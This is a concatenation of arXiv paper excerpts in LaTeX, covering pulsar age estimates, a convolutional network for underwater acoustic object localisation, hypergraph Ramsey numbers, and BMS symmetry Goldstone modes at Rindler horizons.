tail with the time to escape a typical SNR, we calculate a lower age limit for PSR~J1747$-$2958 of
$t_{\mbox{\tiny{total}}}$~{\footnotesize $\geq$}~$163_{-20}^{+28}$~kyr (68\% confidence).
The lower age limit $t_{\mbox{\tiny{total}}}$ exceeds the characteristic age of PSR~J1747$-$2958 by more than a factor of 6, arguably providing
the most robust evidence to date that some pulsars may be much older than their characteristic age. This age discrepancy for PSR~J1747$-$2958
suggests that the pulsar's spin rate is slowing with an estimated braking index $n$~{\footnotesize $\lesssim$}~$1.3$ and that its
magnetic field is growing on a timescale $\approx$15~kyr. Such potential for magnetic field growth in PSR~J1747$-$2958,
in combination with other neutron stars that transcend their archetypal categories such as PSR~J1718$-$3718, a radio pulsar with a
magnetar-strength magnetic field that does not exhibit magnetar-like emission \citep{kaspi}, PSR~J1846$-$0258, a rotation-powered pulsar
that exhibits magnetar-like behaviour \citep{gavril,archibald}, and magnetars such as 1E 1547.0$-$5408 that exhibit radio
emission (\citeauthor{camilo:2} \citeyear{camilo:2}, and references therein), supports the notion that there may be evolutionary links
between the rotation-powered and magnetar classes of neutron stars. However, such a conclusion may be difficult to reconcile with evidence
suggesting that magnetars are derived from more massive progenitors than normal pulsars (e.g., \citeauthor{gaens:8} \citeyear{gaens:8};
\citeauthor{muno} \citeyear{muno}). If the massive progenitor hypothesis is correct, then this raises further questioning of whether, like
the magnetars, there is anything special about the progenitor properties of neutron stars such as PSR~J1747$-$2958, or whether all
rotation-powered pulsars exhibit similar magnetic field growth or even magnetar-like phases in their lifetimes.
To constrain the motion of PSR~J1747$-$2958 further, future observational epochs are desirable. It may be possible to better
constrain the motion and distance to this pulsar by interferometric astrometry with the next generation of sensitive
radio telescopes (e.g., \citeauthor{2004NewAR..48.1413C} \citeyear{2004NewAR..48.1413C}). High time resolution X-ray observations may
also be useful to detect any magnetar-like behaviour from this rotation-powered radio pulsar. In general, more neutron star
discoveries, as well as measured or inferred braking indices, may allow for a better understanding of possible neutron star evolution.
\acknowledgments
We thank the anonymous referee for their helpful comments.
C.~A.~H. acknowledges the support of an Australian Postgraduate Award and a CSIRO OCE Scholarship.
B.~M.~G. acknowledges the support of a Federation Fellowship from the Australian Research Council through grant FF0561298.
S.~C. acknowledges support from the University of Sydney Postdoctoral Fellowship program.
The National Radio Astronomy Observatory is a facility of the National Science Foundation
operated under cooperative agreement by Associated Universities, Inc.
{\it Facilities:} \facility{VLA}.
| 2024-02-18T23:40:07.955Z | 2009-10-15T02:34:52.000Z | algebraic_stack_train_0000 | 1,410 | 6,647 |
|
proofpile-arXiv_065-7038 | \section{Introduction}
The inverse problem consists of posing an approximate model of a system in which its parameters could be estimated from measurements, which are usually indirect. This kind of problem is present in multiple fields of science and engineering, moreover it is especially important in areas like geology and oceanography, where estimating soil properties or characteristics of underwater structures could only be possible through indirect measurements \cite{Linde, Collins}. Specifically, in the area of underwater acoustics, the estimation of position and shape of underwater objects is important for activities such as exploration and navigation, for that reason multiple approaches have been proposed, with analytical methods being the main ones \cite{Linde, Collins, Tarantola}. However, with the rise of high-performance computational methods such as deep neural networks, a great variety convolutional networks models have been proposed to solve inverse problems to different applications \cite{Moseley, Wu, Sorteberg}.
For the above, in this work we propose a convolutional encoder-decoder architecture to estimate a 2D velocity model of an underwater environment, determining approximately the localization, shape and size of objects in the environment. The estimation of the velocity model is made from the reception of the echoes in 11 points of the study medium. To be able to train the convolutional neuronal network (CNN); a model, based on finite-differences method (FDM), is posed with which synthetic data are generated.
The remainder of this paper is as follows. In the \secref{sec:materials_methods}, we describe in detail the methodology used in this work, explaining the procedure to generate synthetic data and the architecture of the proposed CNN. Then, in the \secref{sec:results}, we present the results obtained in the training of the CNN and the analysis of CNN's performance. Finally, in the \secref{sec:conclusion}, we point out the conclusions obtained.
\section{Materials and Methods}\label{sec:materials_methods}
In this section, we describe the inverse problem studied here and, then, we present the methods used to generate data and estimate the solution of the inverse problem using convolutional neural networks.
\subsection{Inverse Problem}\label{sec:inversion_problem}
In the area of underwater acoustics, there is a variety of inverse problems, which, according to \cite{Collins}, are classified into two groups: remote sensing and source localization problems. In this paper we study a remote sensing problem, which seeks to estimate the location and shape of objects found in an aquatic environment; therefore, a CNN model is proposed that can perform this estimation using signals received from eleven points and produced by the propagation of an acoustic signal through the medium and from a point source.
\subsection{Synthetic Data Generation}\label{sec:dataset_generation}
We decided to use synthetic data to train the proposed CNN due to the fact that no public dataset with the required characteristics could be found, and also that obtaining real data would be very expensive in resources. For these reasons, we use the finite difference method to simulate the acoustic wave propagation in an underwater medium in order to generate 20,000 samples under different scenarios.
\subsubsection{Finite-difference method}\label{sec:finite_difference_method}
In order to generate synthetic data, we model the forward problem as the propagation of a plane acoustic wave in an 2D heterogeneous medium \cite{Yang-Hann, Lurton}. To this purpose, we solve the partial differential equation \eqref{eq:wave} using the finite-difference method under an extrapolation approach \cite{Heiner}; where $p$ is the pressure, $c$ is the wave propagation velocity in the medium, $s$ is the acoustic source, $x$ and $z$ are the spatial coordinates, and $t$ is the temporal coordinate.
\setlength{\arraycolsep}{0.0em}
\begin{eqnarray}\label{eq:wave}
\partial_{tt} p(x,z,t) & {}={} & c(x,z)^2 (\partial_{xx} p(x,z,t)+ \partial_{zz} p(x,z,t)) \nonumber\\
&&{+}\:s(x, z, t)
\end{eqnarray}
\setlength{\arraycolsep}{5pt}
The FDM requires to discretize the variables that are shown in \eqref{eq:wave} and approximate partial derivatives as a combination of these variables. To do this, the spatial coordinates $x$ and $z$ are divided into length spacings $dx$ and $dz$, while the temporal coordinate is segmented in time intervals $dt$. In \eqref{eq:index_label}, it can be seen the relation between continuous and discrete variables, where the superscript $n$ is related with timesteps, and subscripts $i$ and $k$ are related with $x$ and $z$, respectively .
\setlength{\arraycolsep}{0.0em}
\begin{equation}
\label{eq:index_label}
p_{i, k}^n = p(i dx,k dz,n dt)
\end{equation}
\begin{equation}
\label{eq:time_derivative}
\partial_{tt} p \approx (p_{i, k}^{n+1} - 2 p_{i, k}^n + p_{i, k}^{n-1})/dt^2
\end{equation}
\begin{eqnarray}\label{eq:x_derivative}
\partial_{xx} p & {}\approx{} & ((p_{i+3, k}^n + p_{i-3, k}^n)/90-3(p_{i+2, k}^n + p_{i-2, k}^{n})/20\nonumber\\
&&{+}\:3(p_{i+1, k}^n + p_{i-1, k}^n)/20-49p_{i, k}^n/18)/dx^2
\end{eqnarray}
\begin{eqnarray}\label{eq:z_derivative}
\partial_{zz} p & {}\approx{} & ((p_{i, k+3}^n + p_{i, k-3}^n)/90-3(p_{i, k+2}^n + p_{i, k-2}^n)/20\nonumber\\
&&{+}\:3(p_{i, k+1}^n + p_{i, k-1}^n)/20-49p_{i, k}^n/18)/dz^2
\end{eqnarray}
\setlength{\arraycolsep}{5pt}
In the approximation of the partial derivatives, we use three-point stencil for the temporal derivative and seven-point stencil for the spatial derivatives; their expressions are \eqref{eq:time_derivative}, \eqref{eq:x_derivative} and \eqref{eq:z_derivative}. From these equations, the variable $p$ is isolated at the timestep $n+1$ as a function of the previous timesteps, which are used to obtain the temporal evolution of the pressure.
Then, we model the medium of propagation as a grid of points, where each point has a specific velocity, which is called the velocity model ($ c_ {i, k} $). By doing so, we can emulate the heterogeneity of the medium and build structures of different shapes within it so that we can also measure echoes produced by the structures when the wave impacts with them, as observed in \figref{subfig:wave_propagated}. The velocity values in the model are in the range of 0 m/s to 3000 m/s; in addition to this, we established the homogeneous medium as water with a velocity equal to 1500 m/s.
Moreover, the dimensions of the velocity model and variables $dx$ and $dz$ determine the physical dimensions of the simulated environment. Given that $dx$ and $dz$ are equal to one-fifth of the minimum wavelength, that is 15 mm, and the model has a dimension equal to $256\times256$, the simulated space has a surface of 14.74 m2. Additionally, we considered a total of 1800 timesteps, each one with a duration of 2.5 $\mu s$, which was determined with the Courant-–Friedrichs-–Lewy condition \cite{Heiner}.
Finally, an acoustic source is fixed in a point of the simulated space, as it is shown in \figref{subfig:wave_propagated}. This source produces a waveform equal to the first derivative of the Gaussian function \eqref{eq:signal_source}. We choose this function because it has a limited bandwidth. In \eqref{eq:signal_source}, the parameter $f_0$ is the maximum signal frequency, and it has a value of 40 kHz.
\begin{equation}
\label{eq:signal_source}
s^n = -2 (n-100) dt^2 f_0^2 e^{((n-100) dt f_0)^2}
\end{equation}
\begin{figure}[tp]
\centering
\subfloat[]{%
\includegraphics[width=0.4\columnwidth]{./Imagenes/velocity_model.png}
\label{subfig:vel_model}
}
\subfloat[]{%
\includegraphics[width=0.4\columnwidth]{./Imagenes/velocity_model_estimated.png}
\label{subfig:wave_propagated}
}
\caption{ (a) Velocity model used in the simulation. (b) Propagation of the acoustic wave in the medium. Black inverted triangles represent measuring points while the green star represent the acoustic source.}
\label{fig:simulation}
\end{figure}
\subsubsection{Structure of samples}\label{sec:structure_samples}
Each individual sample in the dataset is an input-target pair, which is generated by the method described in \secref{sec:finite_difference_method} with different velocity models. We randomly generate velocity models (\figref{subfig:vel_model}) for each simulation, where each one has a different number of objects, in the range of 0 to 10. These objects are disk-or-square-shaped and randomly distributed over the medium; they have a propagation speed of 3000 m/s. Each of the models represents a target that will be normalized and stored in a $256\times256$-array; its respective input consists of the pressure measurements made in 11 fixed positions of the simulated medium, as indicated in \figref{subfig:wave_propagated}. Each measurement starts in the 400th timestep and is stored in a $1400\times11$-array re-scaling them in the range of -50 to 50 units.
\subsection{Convolutional Neural Network Architecture}\label{sec:architecture_CNN}
The proposed CNN has an encoder-decoder architecture, this type of structure consists of two differentiated stages. The first stage is the encoder, it extracts the most relevant features of the input signals and then it encodes them in order to reduce their dimensions. The second stage is called decoder, it interprets the encoded information to produce an output with the desired characteristics. Each of these can be treated as an independent neural network, so in the following sections, we detail each of them.
\begin{figure}[tp]
\subfloat[Encoder]{%
\centerline{
\includegraphics[width=0.4\textwidth]{./Imagenes/encoder.png}%
}
\label{subfig:encoder}
}\\
\subfloat[Decoder]{%
\centerline{
\includegraphics[width=0.4\textwidth]{./Imagenes/decoder.png}%
}
\label{subfig:decoder}
}
\caption{Expanded structure of the encoder and decoder implemented with convolutional layers.}
\label{fig:neural_network}
\end{figure}
\subsubsection{Encoder Structure}\label{sec:encoder_structure}
There is a wide range of encoder structures. Selecting one depends of the shape of the input data and the nature of the phenomenon that produces them \cite{Wu, Sorteberg, Badrinarayanan}. Since our input data are sequences, a traditional approach is using recurrent layers, such as LSTM or GRU, to encode the information; however, the recent use of 1D and 2D convolutional layers have shown great potential to manipulate sequences. In addition to this, they require a lower computational cost, that is why we decided to implement an encoder architecture based on 1D convolutional layers (Conv1D).
The basic structure in the encoder is a sequence of four-layer blocks. Each block is composed by a convolutional layer; followed by a Batch Normalization (BN) layer; an activation layer (ReLU or Sigmoid); and, finally, a max pooling layer. Each layer has its own hyperparameters: kernel size (k) and the padding method (same or valid), for the convolutional layers; window size, for the max-pooling layers; and stride (s), for both. All the hyperparameters of the encoder are shown in \figref{subfig:encoder}.
Regarding the data dimension, the encoder receives an array of $1400\times11$ elements and generates, as an output, an array of $16\times16$ elements. This output contains essential information of the input signals.
\subsubsection{Decoder Structure}\label{sec:decoder_structure}
The decoder structure, in a similar way to the encoder, could be built in many ways, so that its design has to be done considering the nature of both the input and the desired output. Since both input and output of the decoder are two-dimensional arrays, they could be processed as images and, for that reason, 2D convolutional layers (Conv2D) are the main layers in the decoder implementation.
In addition to the Conv2D layers, we also use UpSampling 2D and Batch Normalization (BN) layers. The Conv2D layers have almost the same hyperparameters as the Conv1D layers with the only difference that their kernels are two-dimensional. Moreover, the Up Sampling layers have two hyperparameters: window size and stride, which have values equal to 2 in the decoder implementation. The hyperparameters values for each layer are shown in \figref{subfig:decoder}.
\section{Results}\label{sec:results}
In this section, we will show the training results of the CNN models, as well as some metrics used in the process to evaluate the their performance.
\subsection{CNN Training}\label{sec:training_stage}
In this stage, we propose two additional models in order to compare their performance with that of the model proposed in \secref{sec:architecture_CNN}. These models have residual layers, similar to that shown in \figref{fig:residual_layer}. From now on, the CNN described in \secref{sec:architecture_CNN} will be called InvNet, while the additional models will be called InvNet+1Res and InvNet+2Res; where, notation +1Res and +2Res are references to the number of residual layers added after each max pooling layer in the InvNet's encoder.
\begin{figure}[!t]
\centerline{
\includegraphics[width=0.35\textwidth]{./Imagenes/residual_layer.png}}
\caption{Residual Layer}
\label{fig:residual_layer}
\end{figure}
The proposed CNNs were implemented with Python 3.6 in a server with an Intel Xeon E5-2620 CPU at 2.1 GHz, 128GB RAM and two Nvidia Tesla K40 GPU. The dataset described in \secref{sec:dataset_generation} was divided in training, validation and test sets with a ratio of 70~\%, 15~\% and 15~\%, respectively. Then, the selected cost function was binary cross-entropy, and the optimizer was Adam with a learning rate equal to 0.0002, a first moment ($\beta_1$) equal to 0.5 and a second moment ($\beta_2$) equal to 0.99. Finally, all CNNs were trained with a batch size of 20 during 30 epochs; accuracy and loss curves are shown in \figref{fig:curves}, where it could be seen that they tend to over-fit around the 10th epoch. In the validation set, the CNNs get accuracy and loss values around 97.6~\% and 0.064, respectively.
\begin{figure}[!b]
\centering
\subfloat[Accuracy]{%
\includegraphics[clip,width=0.4\columnwidth]{./Imagenes/Accuracy.png}%
\label{subfig:accuracy}
}
\subfloat[Loss]{%
\includegraphics[clip,width=0.4\columnwidth]{./Imagenes/Loss.png}%
\label{subfig:loss}
}
\caption{Curves obtained during the training stage of the three CNNs.}
\label{fig:curves}
\end{figure}
\subsection{Evaluation of the CNN}\label{sec:evaluation_stage}
After training, we proceed to evaluate and compare the performance achieved by each model. Since the outputs of the CNNs are binary masks, the following metrics will be used in the analysis: accuracy, precision, sensitivity, specificity and intersection over union (IoU).
The accuracy, precision, sensitivity and specificity are calculated with \eqref{eq:accuracy}, \eqref{eq:precision}, \eqref{eq:recall} and \eqref{eq:specificity}; where $tp$ is the number of true positive pixels; $tn$, true negatives; $fp$, false positives; and $fn$, false negatives. Each one of this are measured in relation with pixels of the output image. While accuracy is a global metric that indicates the percentage of pixels correctly classified as solid objects or water, the precision indicates the percentage of pixels properly detected over objects. In a similar way, the sensitivity points out the percentage of pixels of the objects that have been omitted and the specificity is related with the percentage of pixels which are correctly classified as water.
Additionally, IoU measures the percentage of overlap between the ground truth and the estimated velocity model, calculated according to \eqref{eq:IoU}. It gives us an intuition of how well located and sized the objects are.
\begin{figure}[tp]
\centering
\subfloat[][]{%
\includegraphics[clip,width=0.27\columnwidth]{./Imagenes/ground_truth_9991.png}%
\label{subfig:gt1}
}
\subfloat[][]{%
\includegraphics[clip,width=0.27\columnwidth]{./Imagenes/ground_truth_9997.png}%
\label{subfig:gt2}
}
\subfloat[][]{%
\includegraphics[clip,width=0.27\columnwidth]{./Imagenes/ground_truth_9999.png}%
\label{subfig:gt3}
}\\
\subfloat[][]{%
\includegraphics[clip,width=0.27\columnwidth]{./Imagenes/estimated_9991.png}%
\label{subfig:es1}
}
\subfloat[][]{%
\includegraphics[clip,width=0.27\columnwidth]{./Imagenes/estimated_9997.png}%
\label{subfig:es2}
}
\subfloat[][]{%
\includegraphics[clip,width=0.27\columnwidth]{./Imagenes/estimated_9999.png}%
\label{subfig:es3}
}
\caption{Images (a), (b) y (c) show the ground truth velocity model, while images in right side (d), (e) y (f) show the model estimated by InvNet.}
\label{fig:evaluation}
\end{figure}
\begin{equation}
\label{eq:accuracy}
accuracy = (tp + tn) / (tp + fp + tn + fn)
\end{equation}
\begin{equation}
\label{eq:precision}
precision = tp / (tp + fp)
\end{equation}
\begin{equation}
\label{eq:recall}
sensitivity = tp / (tp + fn)
\end{equation}
\begin{equation}
\label{eq:specificity}
specificity = tn / (tn + fp)
\end{equation}
\begin{equation}
\label{eq:IoU}
IoU = (target \cap prediction) / (target \cup prediction)
\end{equation}
These metrics were used over the test set, which has 3000 samples, for each CNN and the results are shown in \tabref{t:metrics}. There, it could be seen that all the CNNs have high values in the accuracy and specificity metrics, but lower values in the precision and sensitivity metrics. These results point out that they can detect the presence of objects but they still have difficulty interpreting interference and echoes. In the case of the IoU metric, all the CNNs obtain high values which indicates that all of them can properly estimate the localization and size of the objects. Despite the InvNet+1Res have a slightly higher performance than the others, it has a higher computational cost than that of InvNet, based on the required number of parameters shown in \tabref{t:metrics}. Since, InvNet has a good performance and low computational cost, it is the best of the three models.
\begin{table}[!b]
\caption{Performance obtained from the CNNs trained}
\begin{center}
\begin{tabular}{|l | l| l| l|}
\hline
\textbf{Models}&\textbf{InvNet}&\textbf{InvNet+1Res}&\textbf{InvNet+2Res} \\
\hline
\textbf{Accuracy} & 97.730\% & 97.853\% & 97.848\% \\
\hline
\textbf{Precision} & 75.880\% & 76.444\% & 76.359\% \\
\hline
\textbf{Sensitivity} & 64.692\% & 67.323\% & 67.285\% \\
\hline
\textbf{Specificity} & 99.131\% & 99.134\% & 99.130\% \\
\hline
\textbf{IoU} & 98.589\% & 98.718\% & 98.708\%\\
\hline
\textbf{Parameters} & 9M & 10M & 11M\\
\hline
\end{tabular}
\label{t:metrics}
\end{center}
\end{table}
Finally, we test InvNet under different situations and the results are shown in \figref{fig:evaluation}. There, it could be seen what was mentioned above; that is, the proposed CNN correctly locates most of the objects, it also estimates their shapes and sizes, but presents some false positives as observed in \figref{subfig:gt2} and \figref{subfig:es2}, as well as some omissions of objects as seen in \figref{subfig:gt3} and \figref{subfig:es3}.
\section{Conclusions}\label{sec:conclusion}
In this work, a convolutional encoder-decoder architecture was proposed to estimate the velocity model of an underwater environment, managing to locate objects and approximate their shapes with a high value in the IoU metric equals to 98.58\%. Despite the fact that the CNN presents a good performance, it can still be improved for in some cases it makes mistakes in detecting objects due to multiple echoes and shadows. These behaviors reflect their effects in the precision and sensitivity metrics where the CNN obtains values of 75.88\% and 64.69\%, respectively.
Additionally, it is important to point out that the proposed CNN shows characteristics such as quick calculation of a velocity model based on acoustic signals, and precision in objects localization and size estimation. Since the proposed model was trained in a great variety of synthetic scenarios, we can infer that it may achieve similar results with signals from real scenarios. This is part of a future work.
\section*{Acknowledgment}
The authors would like to thank the National Institute for Research and Training in Telecommunications (INICTEL-UNI) for the technical and financial support to carry out this work.
| 2024-02-18T23:40:08.369Z | 2019-06-12T02:04:26.000Z | algebraic_stack_train_0000 | 1,434 | 3,197 |
|
proofpile-arXiv_065-7079 | \subsection*{Remarks and acknowledgment}
As was brought to my attention by an anonymous referee, my construction for $r=3$ and $c=4$ is essentially the same as the one used in the proof of Theorem 1(ii) in \cite{CFR} for a different problem, the $4$-color Ramsey number of the so-called \emph{hedgehog}.
A hedgehog with body of order $n$ is a $3$-uniform hypergraph on $n+\binom n2$ vertices such that $n$ vertices form its body, and any pair of vertices from its body are contained in exactly one hyperedge, whose third vertex is one of the other $\binom n2$ vertices, a different one for each hypderedge.
It is easy to see that such a hypergraph is a Berge copy of $K_n$, and while their result, an exponential lower bound for the $4$-color Ramsey number of the hedgehog, does not directly imply mine, their construction is such that it also avoids a monochromatic $\B K_n$.
It is an interesting problem to determine how $R_{r}(\B K_n; c)$ behaves if $c\le \binom r2$.
The first open case is $r=c=3$, just like for hedgehogs.
| 2024-02-18T23:40:08.542Z | 2020-01-23T02:09:27.000Z | algebraic_stack_train_0000 | 1,443 | 192 |
|
proofpile-arXiv_065-7092 | \section{Introduction}
\section{Introduction: BMS symmetry and Goldstone modes}
Black hole is a fascinating object in Einstein's theory of gravity. Even though it exists for a long time, we still do not understand it fully. One of the important properties of it is its very nature as a thermal object. Over the last few years various efforts being made to understand this thermality, transpired to the fact that symmetries, their breaking and associated Goldstone modes may play fundamental role in understanding this subject. In this paper we try to establish this connection between symmetry and thermality of the black holes with some encouraging results.
Symmetry breaking phenomena is ubiquitous in nature. Across a large span of physical problems in particle physics, cosmology and condensed matter physics, it is not only the symmetry, but it's spontaneous breaking also plays very crucial role in understanding the low energy properties. Symmetries in nature are broadly classified into two categories. A symmetry which acts globally on the physical fields are called global symmetry. Most importantly for each global continuous symmetry there exists associated conserved charge which encodes important properties of the system under consideration. Another class of symmetry which acts locally on the fields, generally known as gauge symmetry, makes the description of the system redundant. Unlike global continuous symmetries, gauge symmetry does not have associated non-trivial conserved charge \cite{AlKuwari:1990db}\cite{Karatas:1989mt}. However, as compared to the global symmetry the most striking property of a global continuous symmetry lies in its spontaneous breaking phenomena which plays very important role in understanding the low energy behaviour of the system under consideration. If a global continuous symmetry of a system breaks spontaneously, associated Goldstone boson mode emerges, whose dynamics will characterise the underlying states and their properties of the system \cite{Weinberg:1996kr}.
On the other hand breaking of gauge symmetry is inherently inconsistent with the theory under consideration.
In the present paper, we will be trying to understand the dynamics of the Goldstone boson modes associated with a special class of global symmetry arising at the boundary of a spacetime with nontrivial gravitational background. The generic underlying symmetry of a gravitational theory is spacetime diffeomophism which is a set of local general coordinate transformation. Therefore, diffeomrophism can be thought of as a gauge symmetry of the gravitational theory. However, it is well known that a gauge symmetry in the bulk acts as a non-trivial global symmetry at the boundary. Therefore, even if gravitational theory can be formulated as a gauge theory, theory of Goldstone modes can still be applicable and information about the microscopic gravitational states may be extracted from the boundary global symmetry. Symmetries near the boundary of a spacetime has been the subject of interest for a long time \cite{Bondi:1962px}-\cite{Barnich:2013sxa}.
One of the popular and important examples of such a bulk-boundary correspondence is the well known global Bondi-Metzner-Sachs (BMS) group \cite{Bondi:1962px,Sachs:1962zza,Sachs:1962wk} of transformation. BMS group is an infinite dimensional global symmetry transformation which acts non-trivially on the asymptotic null boundary of an asymptotically flat spacetime. The original study \cite{Sachs:1962zza} was done on the asymptotic null boundary of an asymptotically flat spacetime. Subsequently the analysis on another null boundary namely the event horizon of a black hole spacetime has been studied \cite{Cai:2016idg}-\cite{Akhmedov:2017ftb}. The basic idea is to find out the generators which preserve the boundary structure of a spacetime of our interest under diffeomorphism. Usually, one encounters two types of generators, one is super-translation associated with time reparametrization and other one is super-rotation associated with angular rotation. Over the years it is observed that these generators can play a crucial role in understanding the horizon entropy of a black hole \cite{Iyer:1994ys}-\cite{Majhi:2015tpa}. Since then there is a constant effort to understand these symmetries and its role to uncover the microscopic structure of the horizon thermodynamics. Although there is no significant progress till now, but the motivation is still there which led to some of the recent attempts \cite{Strominger:1997eq}-\cite{Setare:2016qob}.
Moreover in the series of remarkable papers \cite{Weinberg:1965nx}-\cite{Ashtekar:2018lor} a deep connection between ward identities associated with the aforementioned BMS supertranslation symmetries and Weinberg's soft graviton theorem has been unraveled. It is argued that the soft photons are the Goldstone boson modes arising due to spontaneous breaking of the asymptotic symmetries. Hence an equivalence has been established between Wienberg's soft photon theorem and BMS symmetries \cite{Campiglia:2015qka}. More interestingly the same BMS transformation is shown to be closely related with the gravitational memory effect \cite{Strominger:2013jfa}\cite{Strominger:2014pwa}. Subsequently same effect has been shown to arise near the black hole horizon as well \cite{Donnay:2018ckb}.
In the present paper our focus will be on the Killing horizon specifically in Rindler and Schwarzschild background. Those horizons behave like another null boundary where bulk diffeomorphism acts non-trivially in terms of BMS-{\it like} global symmetry \cite{Koga:2001vq} \cite{Iofa:2018pnf}. Associated with those global symmetry on the horizon, black hole microstates have been conjectured to be played by the soft hairs which are essentially the Goldstone boson modes associated with the symmetry broken by the macroscopic black hole state \cite{Dvali:2011aa}-\cite{Hawking:2016msc}. Although the appearance of Goldstone modes in the context of BMS symmetry exits, its dynamical behavior has not been studied in a concrete way. It is believed that the dynamics of those modes should play crucial role in understanding the microscopic nature of the black holes. Having set this motivation, in the present paper we will study the dynamics of those Goldstone modes following the standard procedure.
In order to clarify and better understand the methodology of our calculation, let us consider the emergence of Goldstone boson mode for a well known U(1) invariant complex scalar field theory with the following Lagrangiain, ${\cal L} = 1/2 (\partial_{\mu} \phi \partial^{\mu} \phi^{\dagger}) - V(\phi\phi^{\dagger})$.
The background solution such as $\phi_0 = c$ naturally breaks U(1) symmetry which transforms the vacuum as
\begin{eqnarray}
\phi_0' \rightarrow e^{i \pi(x)} \phi_0 = c + i c \pi(x) .
\label{R1}
\end{eqnarray}
Now we can identify the $\pi(x)$ as Goldstone boson field, and calculate the Lagrangian as follows
\begin{eqnarray}
{\cal L}_{\pi} &=& \frac 12 (\partial_{\mu} \phi_0' \partial^{\mu} \phi_0'^{\dagger}) - V(\phi_0'\phi_0'^{\dagger}) \nonumber \\
&=& \partial_{\mu} (c + i c \pi(x)) \partial^{\mu} (c-i c \pi(x)) - V(c + i c \pi(x)) \nonumber \\
&=& \frac {c^2} {2} \partial_{\mu} \pi(x)) \partial^{\mu} \pi(x) + \cdots.
\end{eqnarray}
The last expression should be the leading order Goldstone boson Lagrangian associated with the broken U(1) symmetry (more detail can be found in \cite{Peskin}). Throughout our following discussions, we will use this analogy to understand the dynamics of the Goldstone mode in the gravity sector.
In the first half of our paper we consider Rindler space time with flat spatial section. In the later half we consider the asymptotically flat Schwarzchild black hole. Once we have a gravitational background, we first identify the global symmetry associated with the null boundary surface \cite{Cai:2016idg}-\cite{Akhmedov:2017ftb} \cite{Maitra:2018saa} imposing the appropriate boundary conditions. {\it Boundary conditions are such that the near horizon form of the metric remains invariant after the symmetry transformation}. However, macroscopic quantities such as mass, charge and angular momentum characterizing the physical states of a black hole under consideration will change under those symmetry transformation. Such phenomena can be understood as a spontaneous breaking of the aforementioned boundary global symmetry by the black hole background. We, therefore, expects the associated dynamical Goldstone boson modes. As mentioned earlier in this paper we will study the dynamics of those Goldstone boson modes which may shed some light on the possible microscopic states of the black holes.
\section{Rindler Background}
In this section we will consider the simplest background and try to understand the symmetry breaking phenomena as described in the introduction.
The Rindler metric, in the Gaussian null coordinate is expressed as
\begin{equation}
ds^2 = -2 r \alpha dv^2 + 2 dv dr + \delta_{AB} dx^A dx^B~.
\label{BRM2}
\end{equation}
The Rindler horizon is located at $r=0$. $\alpha$ is the acceleration parameter which characterizes the macroscopic state of the background spacetime. Symmetry properties of the horizon can be extracted from the following fall off and gauge conditions,
\begin{eqnarray}
\pounds_\zeta g_{rr}= 0, \ \ \ \pounds_\zeta g_{vr}=0, \ \ \ \pounds_\zeta g_{Ar}=0~;\label{con}\\
\pounds_\zeta g_{vv} \approx \mathcal{O}(r); \ \ \ \pounds_\zeta g_{vA} \approx \mathcal{O}(r); \ \ \ \pounds_\zeta g_{AB} \approx \mathcal{O}(r)~.
\label{con1}
\end{eqnarray}
Here, $\pounds_\zeta$ corresponds to the Lie variation for the diffeomorphism $x^a\rightarrow x^a+\zeta^a$. The above conditions are satisfied for the following form of the diffeomorphism vector,
\begin{eqnarray}
\zeta^a \partial_a=&& F(v,y,z) \partial_v -r \partial_v F(v,y,z) \partial_r
\nonumber
\\
&&-r \partial^{A} F(v,y,z) \partial_A~.
\label{BRM1}
\end{eqnarray}
Note that in this case we have only one diffemorphism parameter $F$ which characterizes the symmetry of the Rindler horizon. Since for constant $F$, it essentially gives the time translation, the general form of this time diffemorphsim which acts non-trivially on the $r=0$ hypersurface, is called {\it supertranslation}. For details of this analysis, we refer to \cite{Maitra:2018saa, Donnay:2015abr, Akhmedov:2017ftb}.
We shall see below that under the diffeomorphism (\ref{BRM1}) some of the metric coefficients will transform. This can be thought as similar to the transformation (\ref{R1}) which breaks the $U(1)$ symmetry. The corrections in the metric coefficients are determined by the supertranslation parameter $F$. Consequently the macroscopic parameters of the original metric will be modified and therefore with the analogy of $U(1)$ symmetry breaking, this can be regarded as the breaking of horizon boundary symmetry. Hence one can promote the parameter $F$ as Goldstone mode. Analogous to the U(1) Goldstone mode, here also we shall propose the underlying theory of F to be determined by the Einstein-Hilbert action. We shall find the leading order correction to this action due this aforesaid diffeomorphism which will, as for $U(1)$ symmetry breaking Goldstone, ultimately determine the dynamics of the ``Goldstone modes'' ($F$) in our present context.
In order to study the dynamics, let us first find the modified metric which are consistent with the aforementioned gauge (\ref{con}) and fall-off (\ref{con1}) conditions. Important point to remember that the Lie variation of the metric component in our analysis is defined up to the linear order in $\zeta^a$ and hence we express the form of $\zeta^a$ (\ref{BRM1}) valid up to linear order in $F$. Under this diffeomorphism vector (\ref{BRM1}), the modified metric takes the following form:
\begin{eqnarray}
g'_{ab} &=& \Big [ g^{(0)}_{ab} + \pounds_\zeta g^0_{ab} \Big] dx^a dx^b \nonumber\\
&=& -2 r \alpha dv^2 + 2 dv dr + \delta_{AB} dx^A dx^B \nonumber\\
&+& \Big[-2r\Big(\alpha \partial_{v} F + \partial^2_v F\Big)\Big] dv^2 \nonumber\\
&+& \Big[-2r\Big(\alpha \ \partial_{A}F + \partial_{A} \partial_v F\Big)\Big] dv dx^A\nonumber\\
&+&\big[- 2 r \partial_A \partial_B F \Big] dx^A dx^B~.
\label{rindler}
\end{eqnarray}
In the above, $g^{(0)}_{ab}$ is the original unperturbed metric (\ref{BRM2}), whereas all linear in $F$ terms are incorporated in $h_{ab}$. Under the following supertranslation symmetry transformation,
\begin{equation}
v'= v + F(v,x^A)~,~x'^A = x^A - r\partial^A F(v,x^A) ,
\end{equation}
we can clearly see the macroscopic state parameter $\alpha$ of the original Rindler background transforms into
\begin{equation}
\alpha \rightarrow \alpha +\Big(\alpha \partial_{v} F + \partial^2_v F\Big)\label{alpha} .
\end{equation}
Therefore, this change of macroscopic state by the symmetry transformation can be understood as a breaking of the boundary symmetry of the Rindler spacetime \cite{Eling:2016xlx}. As $F$ is the parameter associated with the broken symmetry generator, following the standard procedure of Goldstone mode analysis, we promote $F$ as a Goldstone boson field. However, all the measure will be done with respect to the usual unprimed coordinate, and dynamics of the mode is defined on the $r=0$ hyper-surface.
Since $\alpha$ appears as a Lagrange multiplier in the Hamiltonian formulation, one usually chooses the gauge where variation of alpha is zero everywhere \cite{Eling:2016xlx,Eling:2016qvx}. However strictly speaking this is not a generic choice. It is sufficient to set the variation of $\alpha$ to be zero only at the boundary for consistency,
\begin{equation}
